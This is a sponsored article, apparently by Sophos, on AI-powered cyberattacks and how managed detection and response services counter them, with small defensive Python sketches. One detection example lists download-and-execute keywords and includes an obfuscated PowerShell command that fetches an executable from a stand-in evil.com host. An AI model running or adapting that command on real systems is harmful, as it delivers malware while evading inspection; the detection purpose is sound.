AI threats and MDR

AI-powered cyberattacks exploit the advantages AI technologies have over humans in speed, precision, coverage and scale, making these attacks more difficult to intercept and counter with traditional in-house security defenses. The increasing likelihood of AI-based attacks is motivating more organizations to seek outside assistance, such as by partnering with a managed detection and response (MDR) provider that is better positioned to deal with AI threats.

AI and the role of MDR are expected to be a major discussion point at RSA's annual security conference, taking place the week of April 24. The following is a preview of that discussion.

Cybersecurity: What are AI threats?

To understand why the AI cybersecurity threat is real, we need only look at recent forecasts and studies that detail its impact on the industry. 

A 2021 study from MIT Technology Review found that 97 percent of global business leaders were troubled by the prospect of AI-enhanced attacks, with 68 percent most concerned about the strategic use of AI in impersonation and spear phishing.

In a recent presentation at Black Hat USA, security researchers demonstrated that next-generation language models such as OpenAI’s GPT-3 could be used to generate phishing messages that “outperformed those that were manually created” by humans.

The difficulty in distinguishing AI from human activity is already being used to prey on the vulnerable. As previously reported by SC Magazine, romance scams (aided by natural language processing tools like ChatGPT) saw consumer-reported losses climb to a record $1.3 billion in 2022, up nearly 138% from 2021. When McAfee’s security team presented a ChatGPT-crafted love letter to more than 5,000 people worldwide, 33 percent thought that a human wrote the letter, while another 36 percent were unable to tell one way or the other.

In just the last couple of weeks, hundreds of tech leaders around the globe – including Elon Musk (CEO of Tesla, SpaceX, and Twitter) and Steve Wozniak (co-founder of Apple) – signed an open letter calling for a six-month pause on the “training of any AI systems more powerful than GPT-4.”

Given how rapidly adversary tactics are evolving, AI-enabled attacks could well become a common fixture in the cybercriminal’s playbook within the next couple of years. Anticipating and dismantling AI attacks will demand a depth of expertise and coordination that some organizations simply do not have the money or resources to cultivate on their own.

MDR could be the tool these organizations need to tip the scales back in their favor. MDR is a service primarily consisting of highly trained cybersecurity professionals who perform ‘managed detection and response’ duties on behalf of a customer. These duties include threat hunting investigations, continuous monitoring, threat detection and response, and guided remediation.

Below, we look at potential ways that AI can be used to attack organizations, as well as how MDR could be used to counter these attacks.

AI-assisted spear phishing

In this attack, the AI automatically scans social media (e.g., LinkedIn, Facebook, Twitter) to identify the interests, professional connections, and online behavior of potential victims. This information can then be turned against a user by crafting language that mimics their communication style or speaks to one of their known interests. The AI can even sort users by gullibility and likelihood of responding, allowing it to concentrate its phishing attacks on particularly vulnerable targets. The sudden dominance of ChatGPT and other natural language processing platforms makes it far easier for criminals to use AI in their phishing attacks.

"The AI-generated emails exhibited nuances such as rapport-building ('How are you feeling? I hope you are feeling better.'), deep organizational knowledge ('We are legally required to do a Privacy Impact Assessment every time we design or update a system.'), and fake context generation ('I’ll be frank with you. <Company Name> is not the best at branding.'). At the same time, the emails included no spelling or grammatical mistakes- typical signs of a phishing email as taught in training.”

From “Turing in a Box: Applying Artificial Intelligence as a Service to Targeted Phishing and Defending against AI-generated Attacks”

MDR security operations analysts and threat hunters are trained to identify indicators of compromise (IOCs) commonly associated with phishing attacks, regardless of whether the language is AI-generated. With the aid of an MDR provider, organizations have better visibility into their IT assets and end users, and can more rapidly determine whether requests from outside the organization are benign. For example, an MDR threat hunter could detect that a sender is abusing a PowerShell command to disguise malware by reading its arguments in reverse. Or they might pinpoint the source of the request by looking at the IP address and cross-referencing it with other documented attacks to determine if there are similarities in origin. AI might be able to dupe gullible users with believable language, but MDR analysts have their eyes on the whole data picture, and the data doesn’t lie.
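To make the reversed-arguments example concrete, here is a minimal Python sketch of one way such obfuscation might be flagged. It is purely illustrative: the keyword list, the flag_reversed_powershell helper, and the sample command line are assumptions made for this sketch, not any vendor’s actual detection logic.

```python
# Hypothetical heuristic: flag PowerShell command lines whose *reversed* text
# contains suspicious keywords that are absent from the forward text -- a
# common sign of string-reversal obfuscation. Illustrative only.
SUSPICIOUS = ("iex", "invoke-expression", "downloadstring", "frombase64string", "http")

def flag_reversed_powershell(cmdline: str) -> list[str]:
    """Return suspicious keywords that appear only when cmdline is reversed."""
    forward = cmdline.lower()
    backward = forward[::-1]
    return [kw for kw in SUSPICIOUS if kw in backward and kw not in forward]

# Example: a URL stored back-to-front and re-reversed by PowerShell at runtime.
sample = '''powershell -c "$u='exe.evil/moc.live//:ptth'; $d=($u[-1..-($u.Length)] -join ''); iwr $d"'''
print(flag_reversed_powershell(sample))  # ['http'] -- the hidden URL surfaces
```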

Deepfakes and vishing attacks

Deepfake attacks involve using AI to generate a believable impersonation of a real human being, typically someone in a leadership position, by mimicking the person’s facial animations and voice. Vishing (or voice phishing) attacks can trick users into thinking they’re in a real phone conversation with another employee, which can easily entice them into giving up valuable information they believe the other party is entitled to have. Adversaries can use AI data mining to compile detailed voice records (e.g., work presentations, speeches) and videos, and then use this training data to generate digital copycats of their human targets.

MDR analysts may not be able to stop criminals from creating deepfakes or initiating vishing attacks, but they can play a role in foiling them. At Sophos, for example, MDR analysts use a deep learning prediction model to analyze encrypted traffic and identify patterns across unrelated network flows. This model can determine if AI is being used to mine data at a massive scale, which allows the MDR team to notify the customer about possible social engineering attempts involving deepfakes or vishing.
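As a rough illustration of how machine-scale data mining can stand out in flow metadata even when payloads are encrypted, the sketch below flags hosts that contact vastly more distinct servers than their peers. The scraping_suspects helper, the (source, server) input shape, and the z-score threshold are all assumptions made for this sketch; Sophos’s actual deep learning model is not public and is certainly more sophisticated.

```python
# A minimal sketch, assuming defenders can see TLS metadata (e.g., SNI server
# names) per source host. A host whose fan-out to distinct servers is a large
# statistical outlier is a candidate for automated, AI-driven data mining.
from collections import defaultdict
from statistics import mean, stdev

def scraping_suspects(flows, z_threshold=3.0):
    """flows: iterable of (src_host, server_name) pairs from flow records.
    Returns hosts whose distinct-server count is a z-score outlier."""
    seen = defaultdict(set)
    for src, server in flows:
        seen[src].add(server)
    counts = {src: len(servers) for src, servers in seen.items()}
    mu = mean(counts.values())
    sigma = stdev(counts.values()) if len(counts) > 1 else 0.0
    return [src for src, n in counts.items()
            if sigma > 0 and (n - mu) / sigma > z_threshold]
```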

Malware communication cloaking

AI can be used to support malware attacks by cloaking malicious activity within what appears to be harmless network traffic. Once an attacker has implanted malware, that implant can use AI to collect and sort network traffic data on ports, requested domain names, and load volumes during certain time periods. This information can then be relayed to the attacker’s command-and-control (C2) server, which registers a domain that shares the properties of the victim’s most commonly requested domain. Once this is arranged, the malware can come online and use the newly created domain to maintain communication with the C2 server, allowing data to be exfiltrated at standard traffic levels and thereby evading security detection. A 2022 research paper authored by Traficom, the Finnish government's transportation and communications agency, even posits that “AI decision logic could theoretically enable malware to run multiple attack steps, find vulnerabilities and exploit them, all without [any] human intervention.”
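To give a feel for what “shares the properties of the victim’s most commonly requested domain” means in practice, here is a toy Python sketch of the similarity scoring a defender might automate against a list of the organization’s top domains. The TOP_DOMAINS list, the lookalike_of helper, and the 0.85 threshold are hypothetical, chosen only for illustration.

```python
# A minimal sketch: a newly observed domain that is *almost* identical to a
# popular one (but not actually it) is a look-alike candidate of exactly the
# kind this cloaking technique produces. Requires Python 3.10+ for `str | None`.
from difflib import SequenceMatcher

TOP_DOMAINS = ["sharepoint.com", "salesforce.com", "examplecorp.com"]  # hypothetical

def lookalike_of(new_domain: str, threshold: float = 0.85) -> str | None:
    """Return the popular domain that new_domain imitates, if any."""
    for known in TOP_DOMAINS:
        if new_domain == known:
            return None  # traffic to the real domain, nothing to flag
        if SequenceMatcher(None, new_domain, known).ratio() >= threshold:
            return known
    return None

print(lookalike_of("examplecorps.com"))  # -> 'examplecorp.com'
```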

Without a high-performing SOC, there’s very little chance that an organization could detect this sort of cloaking on its own. An MDR team, on the other hand, could spot it with relative ease. Sophos MDR, for example, uses encrypted payload analytics that can detect zero-day C2 servers and new variants of malware families based on patterns observed in session size, direction, and interarrival times. It can also identify the presence of domain generation techniques used by malware to avoid detection, such as the one discussed above.
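The interarrival-time idea can be illustrated with a toy beacon score: periodic C2 check-ins with near-uniform sizes produce a variance signature that human-driven traffic almost never does. The beacon_score function, its inputs, and its thresholds are assumptions for this sketch, not Sophos’s actual analytics.

```python
# Toy illustration: repeated sessions between one src/dst pair with
# near-constant spacing and near-identical sizes score close to 1.0.
from statistics import mean, pstdev

def beacon_score(session_times: list[float], session_bytes: list[int]) -> float:
    """Score 0..1; higher means more beacon-like."""
    if len(session_times) < 3:
        return 0.0
    gaps = [b - a for a, b in zip(session_times, session_times[1:])]
    time_cv = pstdev(gaps) / mean(gaps)                     # timing regularity
    size_cv = pstdev(session_bytes) / mean(session_bytes)   # size uniformity
    return max(0.0, 1.0 - (time_cv + size_cv))              # low variance -> high score

# A heartbeat roughly every 60 seconds carrying ~512 bytes:
times = [0.0, 60.2, 119.8, 180.1, 240.0]
sizes = [512, 510, 514, 512, 511]
print(round(beacon_score(times, sizes), 2))  # 0.99 -> strongly beacon-like
```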

The MDR lifeline

As AI-enabled attacks become more common, organizations will need all the help they can get to keep pace with the speed, scale, and adaptive intelligence of this technology. 

MDR may not be the silver bullet that solves all AI-related cybersecurity risks, but it makes a compelling case to be one of the more powerful tools in an organization’s arsenal. Having dedicated support from professional MDR threat hunters and analysts can ensure that organizations with understaffed SOCs aren’t left to navigate this new normal on their own.

AI-assisted cyberattacks are the unfortunate reality going forward, but MDR provides companies with a lifeline to better monitor, identify and rapidly respond to malicious AI before it’s too late. To learn more about how organizations are tackling the AI threat, be sure to tune in to RSA 2023, where AI is expected to frame much of the discussion.
